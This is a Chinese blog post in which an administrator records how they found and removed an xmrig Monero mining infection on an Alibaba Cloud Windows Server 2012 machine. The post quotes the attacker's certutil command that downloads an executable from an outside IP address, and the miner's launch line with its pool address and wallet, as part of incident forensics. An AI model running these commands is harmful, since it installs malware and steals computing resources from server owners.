WindowsServer2012 清除 xmrig miner 门罗币挖矿病毒记录

原因

登录阿里云服务器 WindowsServer2012 远程桌面，发现任务管理器中，存在可疑进程 “XMrig.exe” 占用 cpu 高达 50%以上，内存2个多G。

百度发现 xmrig miner 为 门罗币挖矿机器。

登录到 阿里云 在线管理平台，发现出现了多次告警时间（隔了20多天才看到，好惭愧）

该告警由如下引擎检测发现：
执行命令的进程：xxxxx/oracle/product/10.2.0/db_1/database/System
恶意文件md5：1da0bf986119a583285499047edcd74a
进程id：9,632
描述：通常黑客入侵后会植入挖矿程序赚取收益，该类程序占用CPU等资源，影响用户正常业务，危害较大。且该程序可能还存在自删除行为，
或伪装成系统程序以躲避检测。如果发现该文件不存在，请检查是否存在可疑进程、定时任务或启动项。具体详情可查看帮助：

https://helpcdn.aliyun.com/knowledge_detail/41206.html

该告警由如下引擎检测发现：
父进程路径：xxxxx/oracle/product/10.2.0/db_1/BIN/oracle.exe
父进程命令行：xxxxx\oracle\product\10.2.0\db_1\bin\ORACLE.EXE ORCL
父进程id：1584
进程id：10736
URL链接：http://60.12.77.171:807/fax3.exe
进程路径：C:/Windows/SysWOW64/cmd.exe
命令行参数：cmd /c certutil.exe -urlcache -split -f http://60.12.77.171:807/fax3.exe

一下明白了，被挖矿植入了。通过 oracle 的进程从官网上下载程序，安装并植入。

幸运的是，挖矿程序没有对正常的程序造成影响。

采取步骤

1. 先备份所有必须的文件
2. 查找资料
3. Window 日志管理器

查日志文件，看看有什么异常，别人怎么进来的，进来以后干了些什么。查进程、 分析木马是如何加载的，把对应的木马清除，把漏洞补上。
这个对专业的来说并不复杂。

杀毒软件这种东西不是给服务器用的。 服务器不用的端口全关了，不用的权限都禁掉，只开需要的权限和端口，硬件防火墙

发现搜索了很久，也没找到完全合适的解决办法。（又深深地体会到技术在于平时的积累呀）

尝试1 任务管理器，强制关闭进程。

【结果】发现进程立刻重新启动了。 哭~~~

尝试2 搜索windows如何终止可启动的进程

如何清除病毒等，文章到时一大堆，可没有合适的

发现系统的调度程序会自动启动该程序

【结果】还是没解决

尝试3 结合日志管理器 【解决】

发现只要终止进程，就会在日志管理器上产生一个日志

Started C:\oracle\product\10.2.0\db_1\DATABASE\System -a cn/r -o 
stratum+tcp://pool.supportxmr.com:5555 -u 47BoNDRZPB9VZ6fHZvHJUvFGV7J76d6zxPAP9Z5K879EKMLD4cecEnKJsH2FHBwgZwaFahLPKCaBtPcCEt4wmePo2VwXKgy -p xin
 --donate-level 1 for service FaxSeviceS in C:\oracle\product\10.2.0\db_1\DATABASE.

pool.supportxmr.com:5555

C:\oracle\product\10.2.0\db_1\DATABASE\Process.exe

重点就是“ service FaxSeviceS ” 这个是服务的名字！
那么，在服务窗口，停止服务，
接下来，终止进程
再后来，删除可疑文件

问题【解决】

后续步骤

1. 更改远程桌面 连接密码

解决办法

1. 购买阿里云 云安全中心高级版
2. 养成定时备份服务器习惯

后续思考

1. 病毒怎么进来的？
2. 怎么防护

参考资料

Kubernetes集群节点被入侵挖矿，CPU被占满
https://www.lijiaocn.com/%E9%97%AE%E9%A2%98/2018/07/20/kubernetes-docker-cpu-high.html

阿里云服务器遭受挖矿程序的入侵的清理之战
https://blog.csdn.net/qq_38685242/article/details/97390088

阿里云ECS遭挖矿程序攻击解决方法（彻底清除挖矿程序，顺便下载了挖矿程序的脚本）
https://blog.csdn.net/zzf1510711060/article/details/83015700%20in

初步解决挖矿病毒xmrig cpu miner
https://blog.csdn.net/qq_42906657/article/details/82726906